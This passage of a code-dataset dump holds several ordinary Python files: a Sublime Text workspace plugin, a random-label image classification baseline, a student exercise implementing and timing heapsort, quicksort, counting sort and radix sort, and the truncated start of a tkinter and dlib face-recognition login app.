os.path.dirname(filename)\n if not os.path.isdir(fileDir):\n os.makedirs(fileDir)\n\n # write the file\n with open(filename, 'w') as f:\n wsJSON = sublime.encode_value(vars(self), True)\n f.write(wsJSON)\n\n self.filename = filename\n\n\n def loadFromFile(self, filename):\n \"\"\" Loads a workspace from a file\n\n Arguments:\n filename -- the workspace file to load\n \"\"\"\n\n # open file\n wsJSON = \"\"\n try:\n with open(filename) as f:\n wsJSON = f.read()\n self.buildFromJSON(sublime.decode_value(wsJSON))\n\n except FileNotFoundError:\n sublime.status_message(\"File {} does not exist. 
Opening as New Workspace.\".format(filename))\n\n self.filename = filename\n\n\n ############################################################################\n # Operations\n\n def buildFromWindow(self, window):\n \"\"\" Populates this workspace data from a sublime-text window\n\n Arguments:\n window -- the window to populate from\n \"\"\"\n\n # save the layout\n self.layout = window.layout()\n self.folders = window.folders()\n self.active = window.get_view_index(window.active_view())\n\n # iterate over all groups\n for i in range(window.num_groups()):\n sViews = window.views_in_group(i)\n activeSView = window.active_view_in_group(i)\n\n # create the group\n group = dict()\n group['active'] = sViews.index(activeSView) if sViews else 0\n group['views'] = []\n\n # fill with views\n for sView in sViews:\n # ignore any temporary or unsaved views\n fileExistsOnDisk = sView.file_name()\n if not fileExistsOnDisk:\n continue\n\n view = dict()\n\n view['file'] = sView.file_name()\n view['visible'] = (sView.visible_region().a, sView.visible_region().b)\n view['selection'] = (sView.sel()[0].a, sView.sel()[0].b)\n view['read_only'] = sView.is_read_only()\n\n group['views'].append(view)\n\n self.groups.append(group)\n\n def applyToWindow(self, window):\n \"\"\" Opens this workspace in the provided sublime-text window\n\n Arguments:\n window - window in which to open the easy workspace (will close existing files)\n \"\"\"\n settings = sublime.load_settings(\"EasyWorkspace.sublime-settings\")\n\n # make sure the window is empty\n window.run_command(\"close_all\")\n window.run_command(\"close_folder_list\")\n\n # open layout\n window.set_layout(self.layout)\n\n # open folders\n for folder in self.folders:\n self.__openFolderInWindow(window, folder)\n\n # open views\n for i, group in enumerate(self.groups):\n for j, view in enumerate(group['views']):\n\n # open the file and set group properly\n sView = window.open_file(view['file'])\n window.set_view_index(sView, i, j)\n\n # add slight delay to ensure view is fully opened\n # and ready to have 'visible'/'selection' modified\n time.sleep(0.05)\n\n # set view attributes, region and selection\n sView.set_read_only(view.get('read_only', False))\n\n # when setting the visible region, we want the top of the\n # view to match saved workspace. 
We achieve this by showing\n # bottom, then top of view region.\n if settings.get(\"easy_ws_read_view_region\", False):\n r = sublime.Region(*view['visible'])\n sView.show(r.end(), False)\n sView.show(r.begin(), False)\n\n if settings.get(\"easy_ws_read_view_selection\", False):\n sView.sel().add(sublime.Region(*view['selection']))\n\n # set active views per group\n\n for i, group in enumerate(self.groups):\n if group['active']:\n window.focus_view(window.views_in_group(i)[group['active']])\n if self.active:\n window.focus_group(self.active[0])\n\n # all done\n\n sublime.status_message(\"Opened \" + self.filename)\n\n def buildFromJSON(self, json):\n \"\"\" Constructs a workspace from a provided JSON string\n\n Arguments:\n json -- the JSON string representation of a workspace\n \"\"\"\n self.layout = json['layout']\n self.folders = json['folders']\n self.active = json['active']\n self.groups = json['groups']\n\n return self\n\n ############################################################################\n\n def __openFolderInWindow(self, window, folder):\n \"\"\" opens a folder in the provided sublime text window\n\n Arguments:\n window - where the folder should be opened\n folder - the folder path to open\n \"\"\"\n if not (window and folder and os.path.isdir(folder)):\n return\n\n # get current folders list\n project_data = window.project_data() if window.project_data() else {'folders': []}\n folder = os.path.normpath(folder)\n\n # check if it already exists\n for f in project_data['folders']:\n if f['path'] and folder == f['path']:\n return # already exists\n\n # create folder data\n folder_struct = { 'path': folder, 'follow_symlinks': True }\n\n # add folder data to window\n project_data['folders'].append(folder_struct)\n window.set_project_data(project_data)\n\n\n################################################################################\n# Plugin Commands\n################################################################################\n\nclass EasyWorkspaceCommand:\n \"\"\" An interface for easy workspace commands \"\"\"\n\n # shared dictionary which stores the currently open workspace file for each\n # open window in sublime\n _openWorkspaceFiles = dict()\n\n # store the last workspace to reopen as needed\n _reopenWorkspace = \"\"\n\n def run(self, **kwargs):\n \"\"\" runs a command and garbage collects openWorkspaceFiles \"\"\"\n self.__garbageCollectOpenWorkspaceFiles()\n\n ############################################################################\n\n def __garbageCollectOpenWorkspaceFiles(self):\n \"\"\" removes all closed window ids from our shared state data \"\"\"\n openIds = [window.id() for window in sublime.windows()]\n invalidIds = [wid for wid in self._openWorkspaceFiles if wid not in openIds]\n for wid in invalidIds:\n del self._openWorkspaceFiles[wid]\n\n\n ############################################################################\n\n def getWorkspacesDir(self):\n \"\"\" returns the EasyWorkspace workspaces directory from settings \"\"\"\n settings = sublime.load_settings(\"EasyWorkspace.sublime-settings\")\n wsFolder = settings.get(\"easy_ws_save_directory\", \"EasyWorkspace/workspaces\")\n return os.path.join(sublime.packages_path(), wsFolder + os.path.sep)\n\n def getWorkspaceFilepath(self, filename):\n \"\"\" Resolves a filename into its full easyworkspace path,\n including directory and extension\n\n Arguments:\n filename - the filename to resolve as full workspace file\n \"\"\"\n settings = sublime.load_settings(\"EasyWorkspace.sublime-settings\")\n\n 
workspacesDir = self.getWorkspacesDir()\n baseName, extension = os.path.splitext(filename)\n if not extension:\n extension = settings.get('easy_ws_file_extension', '.ws')\n return os.path.join(workspacesDir, baseName+extension)\n\n def getAllWorkspaceFiles(self):\n \"\"\" returns a list of all easy workspace files \"\"\"\n workspacesDir = self.getWorkspacesDir()\n workspaceFiles = []\n for root, dirs, files in os.walk(workspacesDir):\n for file in files:\n # ignore any hidden files\n if file.startswith('.'):\n continue\n\n # trim base workspace directory for display\n subdir = root[len(workspacesDir):]\n workspaceFiles.append(os.path.join(subdir, file))\n\n return workspaceFiles\n\n################################################################################\n\nclass SaveEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which saves an easy workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Save this window's workspace\n\n Keyword Arguments:\n filename = workspace file to save\n promptOverwrite = indicates if we should prompt before overwriting a file\n promptSave = indicates if we should prompt before saving a new file\n \"\"\"\n super().run(**kwargs)\n\n # are we saving a new workspace?\n isNewWorkspace = self.window.id() not in EasyWorkspaceCommand._openWorkspaceFiles\n noFileProvided = kwargs.get('filename', None) == None\n\n if isNewWorkspace and noFileProvided:\n # use save-as to get the filename!\n self.window.run_command(\"save_as_easy_workspace\", kwargs)\n\n else:\n self.window.status_message(\"Saving workspace...\")\n\n ws = EasyWorkspace()\n ws.buildFromWindow(self.window)\n\n # resolve the full filepath\n fullFilePath = self.getWorkspaceFilepath(kwargs.get('filename', EasyWorkspaceCommand._openWorkspaceFiles.get(self.window.id())))\n\n # prompt for overwrite or create new\n doSaveDialogResult = sublime.DIALOG_YES\n if (kwargs.get(\"promptOverwrite\", False) and os.path.isfile(fullFilePath)):\n doSaveDialogResult = sublime.yes_no_cancel_dialog(\"Overwrite Easy Workspace?\\n\\n{}\".format(fullFilePath))\n elif (kwargs.get(\"promptSave\", False)):\n doSaveDialogResult = sublime.yes_no_cancel_dialog(\"Save New Workspace?\\n\\n{}\".format(fullFilePath))\n\n # save if not cancelled\n if doSaveDialogResult != sublime.DIALOG_YES:\n self.window.status_message(\"Canceled\")\n else:\n ws.saveToFile(fullFilePath)\n EasyWorkspaceCommand._openWorkspaceFiles[self.window.id()] = fullFilePath\n self.window.status_message(\"Saved \" + fullFilePath)\n\n\n################################################################################\n\nclass SaveAsEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which saves an easy workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Save this window's workspace, prompt for filename if necessary\n\n Arguments:\n filename - if present, will save directly to the provided filename\n without prompting\n \"\"\"\n super().run(**kwargs)\n\n # where do we want to save?\n if kwargs.get(\"filename\", None):\n self.onUserEntersFilename(kwargs.get(\"filename\"))\n else:\n self.window.show_input_panel(\"Save Workspace:\",\n \"\",\n self.onUserEntersFilename,\n None,\n None)\n\n def onUserEntersFilename(self, filename):\n \"\"\" callback when user enters the filename via the input dialog\n\n Arguments:\n filename -- text user entered for filename\n \"\"\"\n userCanceled = filename is None\n if userCanceled:\n self.window.status_message(\"Canceled\")\n 
else:\n self.window.run_command(\"save_easy_workspace\", dict(filename=filename, promptOverwrite=True))\n\n\n################################################################################\n\nclass OpenEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which opens an easy workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Opens an easy workspace and may prompt user to choose which\n\n * if the current window is empty, will open the workspace in the current window\n * otherwise, the workspace will be opened in a new window\n\n Arguments:\n filename - identifies which workspace to open directly\n \"\"\"\n super().run(**kwargs)\n\n sublime.status_message(\"Opening workspace...\")\n\n # prompt for filename if needed\n filename = kwargs.get('filename', None)\n if not filename:\n # prompt the user for the filename\n # the callback will return to this function from the top with\n # filename specified\n self.promptUserForFilename()\n return\n\n # open in current or new window as needed\n targetWindow = self.window if self.windowEmpty() else self.openNewWindow()\n\n # build and open the workspace\n fullFilePath = self.getWorkspaceFilepath(filename)\n\n ws = EasyWorkspace()\n ws.loadFromFile(fullFilePath)\n ws.applyToWindow(targetWindow)\n\n EasyWorkspaceCommand._openWorkspaceFiles[targetWindow.id()] = fullFilePath\n\n sublime.status_message(\"Opened {}\".format(fullFilePath))\n\n def promptUserForFilename(self):\n \"\"\" prompts a user to select an easyworkspace file from the workspace directory \"\"\"\n workspaceFiles = self.getAllWorkspaceFiles()\n\n # create callback\n def onWorkspaceFileSelected(index):\n noSelection = index < 0\n if noSelection:\n self.window.status_message(\"Canceled\")\n else:\n # rerun the open command with file specified\n self.window.run_command(\"open_easy_workspace\", dict(filename=workspaceFiles[index]))\n self.window.show_quick_panel(workspaceFiles, onWorkspaceFileSelected)\n\n def windowEmpty(self):\n \"\"\" returns true if this command's sublime window is empty \"\"\"\n return len(self.window.views()) == len(self.window.folders()) == 0\n\n def openNewWindow(self):\n \"\"\" opens a new sublime window and returns the resulting handle \"\"\"\n preWindows = sublime.windows()\n sublime.run_command(\"new_window\")\n newWindow = [window for window in sublime.windows() if not window in preWindows][0]\n return newWindow\n\n\n################################################################################\n\nclass DeleteEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which allows a user to delete a workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Delete an easy workspace \"\"\"\n super().run(**kwargs)\n\n # get list of all saved workspaces\n workspaceFiles = self.getAllWorkspaceFiles()\n\n def onWorkspaceFileSelected(index):\n noSelection = index < 0\n if noSelection:\n self.window.status_message(\"Canceled\")\n else:\n fullFilePath = self.getWorkspaceFilepath(workspaceFiles[index])\n\n # are we sure we want to delete?\n if sublime.yes_no_cancel_dialog(\"Delete Workspace {}?\".format(fullFilePath)) == sublime.DIALOG_YES:\n os.remove(fullFilePath)\n self.window.status_message(\"Deleted\")\n else:\n self.window.status_message(\"Canceled\")\n\n # display list to user\n self.window.status_message(\"Deleting workspace...\")\n self.window.show_quick_panel(workspaceFiles, 
onWorkspaceFileSelected)\n\n\n################################################################################\n\nclass ShowOpenedEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which shows the user this window's current opened workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Show the opened easy workspace \"\"\"\n super().run(**kwargs)\n\n # get open workspace files relative to workspaces directory\n openWorkspaces = {k:v.replace(self.getWorkspacesDir(), \"\") for k,v in EasyWorkspaceCommand._openWorkspaceFiles.items()}\n\n # prepend an \"*\" to our window's open workspace if applicable\n if self.window.id() in openWorkspaces:\n openWorkspaces[self.window.id()] = \" * \" + openWorkspaces[self.window.id()]\n\n # show the open workspaces\n self.window.show_quick_panel(list(openWorkspaces.values()), None)\n\n################################################################################\n\nclass ReopenLastEasyWorkspaceCommand(EasyWorkspaceCommand, sublime_plugin.WindowCommand):\n \"\"\" A sublime window command which reopens the last easy workspace \"\"\"\n\n def run(self, **kwargs):\n \"\"\" Reopen the last easy workspace \"\"\"\n super().run(**kwargs)\n\n if EasyWorkspaceCommand._reopenWorkspace and os.path.isfile(EasyWorkspaceCommand._reopenWorkspace):\n self.window.run_command(\"open_easy_workspace\", dict(filename=EasyWorkspaceCommand._reopenWorkspace))\n else:\n self.window.status_message(\"Unable to Reopen Workspace \" + EasyWorkspaceCommand._reopenWorkspace)\n\n################################################################################\n# Plugin Listeners\n################################################################################\n\nclass AutoSaveEasyWorkspace(EasyWorkspaceCommand, sublime_plugin.EventListener):\n \"\"\" plugin class which autosaves easy workspaces as needed \"\"\"\n\n def on_window_command(self, window, command_name, args):\n \"\"\" saves the current easy workspace if the user closes part of it \"\"\"\n settings = sublime.load_settings(\"EasyWorkspace.sublime-settings\")\n\n # should we autosave?\n usingEasyWs = window.id() in EasyWorkspaceCommand._openWorkspaceFiles\n saveEnabled = settings.get('easy_ws_save_on', False)\n if not (usingEasyWs and saveEnabled):\n return\n\n #\n # certain commands will prompt EasyWorkspace to autosave the current workspace\n # the following lists highlight these commands, and are ordered for easy\n # comparison of command-setting\n #\n # these commands are considered to 'close' the workspace, and will also\n # store the current workspace to be reopened via the OpenLastWorkspace command\n #\n commandsThatCloseWorkspace = [\"close_folder_list\", \"close_project\",\n \"prompt_open_project_or_workspace\",\n \"prompt_switch_project_or_workspace\",\n \"prompt_select_workspace\",\n \"close_all\", \"close_window\"]\n\n if command_name in commandsThatCloseWorkspace:\n EasyWorkspaceCommand._reopenWorkspace = EasyWorkspaceCommand._openWorkspaceFiles[window.id()]\n\n # Are autosave settings enabled for this command?\n autosaveSettingName = \"easy_ws_save_on_\" + command_name\n if settings.get(autosaveSettingName, False):\n result = window.run_command(\"save_easy_workspace\", dict(promptOverwrite=True, promptSave=True))\n","repo_name":"jmooney/EasyWorkspace-sublime","sub_path":"easy-workspace.py","file_name":"easy-workspace.py","file_ext":"py","file_size_in_byte":21277,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"94"}
+{"seq_id":"8164569476","text":"import os\nimport cv2 as cv\nimport random\nimport time\nseed = random.randint(1, 10000)\nprint('Random seed: {}'.format(seed))\nrandom.seed(seed)\nstart=time.perf_counter()\n#读取图片形成字典\npath=\"scene_categories\"\nfiles=os.listdir(path)\nprint(files)\ni=0\nimg_dict={}\nfor file in files:\n path_img=path+\"/\"+file\n imgs=os.listdir(path_img)\n for img in imgs:\n img_path=path_img+\"/\"+img\n img_dict[str(cv.imread(img_path))]=i\n i=i+1\nprint(len(img_dict))\n# accuracy=0\n# for i in range(100):#随机取出一百张图片,为其分配标签,判断准确率\n# index=random.randint(0,len(img_dict)-1)\n# label=random.randint(0,14)\n# if label==img_dict[list(img_dict.keys())[index]]:\n# accuracy=accuracy+1\n# print(\"随机分类的准确率为\",accuracy/100)\n#生成测试集\naccuracy=[]\ntest_img={}\nnum=0\nfor file in files:\n #从每个场景里取100张图片\n path_img=path+\"/\"+file\n imgs=os.listdir(path_img)\n acc=0\n for i in range(100):\n index=random.randint(0,len(imgs)-1)\n label=random.randint(0,14)\n img_path=path_img+\"/\"+imgs[index]\n test_img[str(cv.imread(img_path))]=label\n if label==num:\n acc=acc+1\n accuracy.append(acc/100)\n num=num+1\ntotal_acc=0\nfor i in range(len(test_img)):\n if img_dict[list(test_img.keys())[i]]==test_img[list(test_img.keys())[i]]:\n total_acc=total_acc+1\nprint(\"每个场景的平均分类准确度为\",accuracy)\nprint(len(test_img))\nprint(\"所有场景的平均分类度为\",total_acc/len(test_img))\nend=time.perf_counter()\nprint(\"运行时间{} s\".format(end-start))","repo_name":"BaiZe337/CV","sub_path":"图像分类_随机分类.py","file_name":"图像分类_随机分类.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"27513443500","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import uniform, randint, choice\nfrom os.path import exists\nfrom timeit import default_timer as timer\nfrom math import sqrt, ceil\n\n\nclass Robot:\n def __init__(self, typ, price, range_, camera):\n self.type_ = typ\n self.price = price\n self.range_ = range_\n self.camera = camera\n\n\nclass Factory:\n def __init__(self):\n self.robo_lst = []\n\n def createRobo(self, cnt):\n self.robo_lst = [Robot(typ=choice([\"AGV\", \"AFV\", \"ASV\", \"AUV\"]),\n price=round(uniform(0, 10000), 2),\n range_=randint(0, 100),\n camera=randint(0, 1))\n for i in range(cnt)]\n\n def moveRobo(self):\n print(f\"+{'-' * 5}+{'-' * 14}+{'-' * 8}+{'-' * 8}+\")\n print(f\"|{' ' * 1}TYP{' ' * 1}|\"\n f\"{' ' * 4}PRICE{' ' * 5}|\"\n f\"{' ' * 2}RANGE{' ' * 1}|\"\n f\"{' ' * 2}CAM{' ' * 3}|\")\n for robot in self.robo_lst:\n x = len(f\"{robot.price : 0.2f}\")\n print(f\"+{'-' * 5}+{'-' * 14}+{'-' * 8}+{'-' * 8}+\")\n print(f\"|{' ' * 1}{robot.type_}{' ' * 1}|\"\n f\"{' ' * (10 - x)}{robot.price : 0.2f}{' ' * 1}zł{' ' * 1}|\"\n f\"{' ' * (4 - len(str(robot.range_)))}{robot.range_}{' ' * 1}km{' ' * 1}|\"\n f\"{' ' * 2}{'jest' if robot.camera == 0 else 'brak'}{' ' * 2}|\")\n\n def saveRobo(self, location):\n payload = [{\"typ\": robot.type_, \"price\": robot.price, \"range_\": robot.range_,\n \"camera\": robot.camera} for robot in self.robo_lst]\n with open(f\"./{location}.json\", \"w\") as f:\n json.dump(payload, f, indent=4)\n\n def readRobo(self, location):\n if not exists(f\"./{location}.json\"):\n raise FileNotFoundError\n else:\n with open(f\"./{location}.json\", \"r\") as f:\n dane = json.load(f)\n self.robo_lst = [Robot(robot[\"typ\"], robot[\"price\"], robot[\"range_\"], robot[\"camera\"])\n for robot in dane]\n\n\n# Heapsort with steps\ndef stepheapify(arr, n, i, steps):\n pivot = i\n l = 2 * i + 1\n r = 2 * i + 2\n steps.append([steps[-1][0] + 1,\n f\"Is left = {l} less than the length of the list = {n} and is the price of the pivot less than the \"\n f\"price of the left?\",\n steps[-1][2].copy()])\n if l < n and arr[pivot].price < arr[l].price:\n pivot = l\n steps.append([steps[-1][0] + 1, \"Yes, change the pivot to the number l\", steps[-1][2].copy()])\n else:\n steps.append([steps[-1][0] + 1, \"No, proceed further\", steps[-1][2].copy()])\n\n steps.append([steps[-1][0] + 1,\n f\"Is right = {r} less than the length of the list = {n} and is the price of the pivot less than the \"\n f\"price of the right?\",\n steps[-1][2].copy()])\n if r < n and arr[pivot].price < arr[r].price:\n pivot = r\n steps.append([steps[-1][0] + 1, \"Yes, change the pivot to the number r\", steps[-1][2].copy()])\n else:\n steps.append([steps[-1][0] + 1, \"No, move over\", steps[-1][2]].copy())\n\n steps.append([steps[-1][0] + 1, f\"Did pivot change?\", steps[-1][2]].copy())\n if pivot != i:\n arr[i], arr[pivot] = arr[pivot], arr[i]\n temp = steps[-1][2].copy()\n temp[i], temp[pivot] = temp[pivot], temp[i]\n steps.append([steps[-1][0] + 1, \"Yes, swap them and repeat the heapification\", temp])\n stepheapify(arr, n, pivot, steps)\n else:\n steps.append([steps[-1][0] + 1, \"No, leave the heap\", steps[-1][2].copy()])\n\n\ndef stepheapsort(arr, steps):\n n = len(arr)\n for i in range(n // 2 - 1, -1, -1):\n stepheapify(arr, n, i, steps)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n temp = steps[-1][2].copy()\n temp[0], temp[i] = temp[i], temp[0]\n steps.append([steps[-1][0] + 1, f\"Swap the start and the 
i-th position = {i}\", temp])\n stepheapify(arr, i, 0, steps)\n\n\ndef stepheap(arr):\n w = [a.price for a in arr]\n x = np.argsort(np.argsort(w))\n y = [[0, \"Start\", x]]\n stepheapsort(arr, y)\n for el in y:\n print(f\"{el[0]}. {el[1]}\")\n print(f\"{el[2]}\")\n\n\n# Heapsort bez kroków\ndef heapify(arr, n, i):\n pivot = i\n l = 2 * i + 1\n r = 2 * i + 2\n\n if l < n and arr[pivot].price < arr[l].price:\n pivot = l\n\n if r < n and arr[pivot].price < arr[r].price:\n pivot = r\n\n if pivot != i:\n arr[i], arr[pivot] = arr[pivot], arr[i]\n heapify(arr, n, pivot)\n\n\ndef heapsort(arr):\n n = len(arr)\n for i in range(n // 2 - 1, -1, -1):\n heapify(arr, n, i)\n for i in range(n - 1, 0, -1):\n arr[0], arr[i] = arr[i], arr[0]\n heapify(arr, i, 0)\n\n\n# Quicksort z krokami\n\ndef steppartition(arr, l, r, steps):\n pivot = arr[r].price\n x = l - 1\n for y in range(l, r):\n steps.append(\n [steps[-1][0] + 1, f\"Is walking through the loop {arr[y].price} less than or equal to the pivot = {pivot}?\",\n steps[-1][2].copy()])\n if arr[y].price <= pivot:\n x += 1\n arr[x], arr[y] = arr[y], arr[x]\n temp = steps[-1][2].copy()\n temp[x], temp[y] = temp[y], temp[x]\n steps.append(\n [steps[-1][0] + 1,\n f\"Yes, increase the low index by one and swap its value with the value at the loop index\", temp])\n else:\n steps.append(\n [steps[-1][0] + 1, f\"No, move over\", steps[-1][2].copy()])\n\n arr[x + 1], arr[r] = arr[r], arr[x + 1]\n temp = steps[-1][2].copy()\n temp[x + 1], temp[r] = temp[r], temp[x + 1]\n steps.append(\n [steps[-1][0] + 1, f\"Swap the values at low index + 1 and high index, and return low index + 1\", temp])\n return x + 1\n\n\ndef stepquicksort(arr, l, r, steps):\n steps.append([steps[-1][0] + 1, f\"Is the low value = {l} less than the high value = {r}?\", steps[-1][2].copy()])\n if l < r:\n steps.append(\n [steps[-1][0] + 1, f\"Yes, we find the partition position.\", steps[-1][2].copy()])\n p = steppartition(arr, l, r, steps)\n stepquicksort(arr, l, p - 1, steps)\n stepquicksort(arr, p + 1, r, steps)\n else:\n steps.append(\n [steps[-1][0] + 1, \"No, leave this section untouched\", steps[-1][2].copy()])\n\n\ndef stepquick(arr):\n w = [a.price for a in arr]\n x = np.argsort(np.argsort(w))\n y = [[0, \"Start\", x]]\n stepquicksort(arr, 0, len(arr) - 1, y)\n for el in y:\n print(f\"{el[0]}. 
{el[1]}\")\n print(f\"{el[2]}\")\n\n\n# Quicksort without steps\n\ndef partition(arr, l, r):\n pivot = arr[r].price\n x = l - 1\n for y in range(l, r):\n if arr[y].price <= pivot:\n x += 1\n arr[x], arr[y] = arr[y], arr[x]\n arr[x + 1], arr[r] = arr[r], arr[x + 1]\n return x + 1\n\n\ndef quicksort(arr, l, r):\n if l < r:\n p = partition(arr, l, r)\n quicksort(arr, l, p - 1)\n quicksort(arr, p + 1, r)\n\n\n# Countsort\ndef countsort(arr):\n count = [0 for _ in range(101)]\n for r in arr:\n count[r.range_] += 1\n for i in range(1, 101):\n count[i] += count[i - 1]\n\n out = [None] * len(arr)\n for i in range(len(arr) - 1, -1, -1):\n z = arr[i].range_\n count[z] -= 1\n pos = count[z]\n out[pos] = arr[i]\n return out\n\n\n# Radixsort\n\ndef radixsort(matrix, col=0):\n if col >= len(matrix[0]):\n return matrix\n max_val = max(row[col] for row in matrix)\n exp = 1 # 10^(exp-1)\n\n while max_val // exp > 0:\n matrix = countingsort(matrix, col, exp)\n exp *= 10\n\n # Moving through columns if they are identical\n idx = 0\n while idx < len(matrix):\n end = idx + 1\n while end < len(matrix) and matrix[idx][0:col + 1] == matrix[end][0:col + 1]:\n # The above loop checks if there is a repeated value between the row with id and the row with end for\n # the first col columns. If so, it creates a new matrix containing those rows and passes it to radix,\n # shifting the current column one step to the right.\n end += 1\n group = matrix[idx:end]\n if len(group) > 1: # Check if the group consists of more than one row\n matrix[idx:end] = radixsort(group, col + 1)\n idx = end\n return matrix\n\n\ndef countingsort(matrix, col, exp):\n count = [0] * 10 # 10 digits\n out = [0] * len(matrix)\n\n for row in matrix:\n digit = (row[col] // exp) % 10\n count[digit] += 1\n\n for i in range(1, 10):\n count[i] += count[i - 1]\n\n for row in reversed(matrix):\n digit = (row[col] // exp) % 10\n count[digit] -= 1\n out[count[digit]] = row\n\n return out\n\n\ndef plot(f: Factory, n=1000):\n t_heap, t_quick, t_count, t_radix = [], [], [], []\n robot_arr = [_ for _ in range(10, n + 1, 10)]\n for i in robot_arr:\n print(i)\n f.createRobo(i)\n\n start = timer()\n heapsort(f.robo_lst.copy())\n t_heap.append(timer() - start)\n\n start = timer()\n quicksort(f.robo_lst.copy(), 0, len(f.robo_lst) - 1)\n t_quick.append(timer() - start)\n\n start = timer()\n countsort(f.robo_lst)\n t_count.append(timer() - start)\n\n ceilsqrt = ceil(sqrt(i))\n matrix = [[randint(0, ceilsqrt) for _ in range(i)] for __ in range(i)]\n start = timer()\n radixsort(matrix)\n t_radix.append(timer() - start)\n\n fig, ax = plt.subplots()\n ax.plot(robot_arr, t_heap, c=\"red\", label=\"Heapsort\")\n ax.plot(robot_arr, t_quick, c=\"green\", label=\"Quicksort\")\n ax.plot(robot_arr, t_count, c=\"blue\", label=\"Countsort\")\n ax.plot(robot_arr, t_radix, c=\"black\", label=\"Radixsort\")\n plt.legend()\n plt.show()\n\n\nf = Factory()\n\n\ndef zad1():\n f.createRobo(10)\n stepheap(f.robo_lst)\n f.moveRobo()\n\n\ndef zad2():\n f.createRobo(10)\n stepquick(f.robo_lst)\n f.moveRobo()\n\n\ndef zad3():\n f.createRobo(10)\n f.robo_lst = countsort(f.robo_lst)\n f.moveRobo()\n\n\ndef zad4():\n tab = [\n [1, 2, 3, 4],\n [7, 8, 10, 10],\n [5, 2, 1, 3],\n [7, 6, 10, 12],\n [7, 8, 10, 13],\n [2, 1, 3, 7]\n ]\n tab = radixsort(tab)\n for row in tab:\n print(row)\n\n\ndef zad5():\n 
plot(f)\n\n\n#zad1()\nzad5()\n","repo_name":"kobala58/PWR","sub_path":"projektowanie_algorytmow/L9.py","file_name":"L9.py","file_ext":"py","file_size_in_byte":10437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"}
+{"seq_id":"16460351860","text":"from tkinter import PhotoImage\r\nimport datetime\r\nimport tkinter as tk\r\nimport cv2\r\nfrom PIL import Image, ImageTk\r\nimport util\r\nimport sqlite3 \r\nimport dlib\r\nfrom tkinter import messagebox\r\nimport numpy as np\r\nimport pandas as pd\r\nimport customtkinter\r\nimport cv2\r\n\r\nclass App:\r\n def __init__(self):\r\n self.flag=False\r\n self.current_time = datetime.datetime.now()\r\n self.cascPath =\"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/haarcascade_frontalface_default.xml\"\r\n self.faceCascade = cv2.CascadeClassifier(self.cascPath)\r\n self.font = cv2.QT_FONT_NORMAL\r\n self.first_window = tk.Tk()\r\n self.first_window.geometry(\"1100x600+350+100\")\r\n self.first_window.resizable(width=False,height=False)\r\n self.first_window.title(\"FacialRecognition\")\r\n self.face_detector = dlib.get_frontal_face_detector()\r\n self.face_recognizer = dlib.face_recognition_model_v1(\"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/dlib_face_recognition_resnet_model_v1.dat\")\r\n self.shape_predictor = dlib.shape_predictor(\"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/shape_predictor_68_face_landmarks.dat\")\r\n self.conn = sqlite3.connect(\"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/maindatabase\")\r\n self.c = self.conn.cursor()\r\n self.d = self.conn.cursor()\r\n self.e=self.conn.cursor()\r\n self.c.execute(\"CREATE TABLE IF NOT EXISTS users (id INTEGER PRIMARY KEY,username TEXT, face_descriptor TEXT)\")\r\n self.d.execute(\"CREATE TABLE IF NOT EXISTS logs (id INTEGER ,logintime_time DATETIME,logouttime_time DATETIME)\")\r\n self.image_pathnew = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/first.png\" \r\n self.imagenew = PhotoImage(file=self.image_pathnew)\r\n\r\n self.image_labelnew = tk.Label(self.first_window, image=self.imagenew)\r\n self.image_labelnew.pack()\r\n self.image_labelnew.place(x=0, y=0, width=1100, height=600)\r\n \r\n self.login_button_first_window=customtkinter.CTkButton(master=self.first_window, text=\"Proceed\", command=self.main,height=80,width=325,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#7BC2FF\",fg_color=\"#109945\")\r\n self.login_button_first_window.place(x=375, y=255)\r\n def main(self):\r\n self.main_window= tk.Toplevel(self.first_window)\r\n self.main_window.geometry(\"1100x600+350+100\")\r\n self.main_window.resizable(width=False,height=False)\r\n self.main_window.title(\"FacialRecognition\")\r\n self.main_window.configure(background=\"white\")\r\n self.image_path = \"C:/Users/akash/OneDrive/Documents/College/deeplearning/FacialRecognitionProject/logo2.png\" \r\n self.image = PhotoImage(file=self.image_path)\r\n\r\n self.image_label = tk.Label(self.main_window, image=self.image)\r\n self.image_label.pack()\r\n self.image_label.place(x=0, y=0, width=1100, height=600)\r\n \r\n self.login_button_main_window=customtkinter.CTkButton(master=self.main_window, text=\"Login\", command=self.login,height=50,width=275,font=('Sans-serif', 30),corner_radius=20,hover=True,border_width=1,border_color=\"black\",bg_color=\"#64AFFF\",fg_color=\"#109945\")\r\n self.login_button_main_window.place(x=760, y=100)\r\n self.logout_button_main_window = customtkinter.CTkButton(master=self.main_window, text=\"Logout\", command=self.logout,height=50,width=275,font=('Sans-serif', 
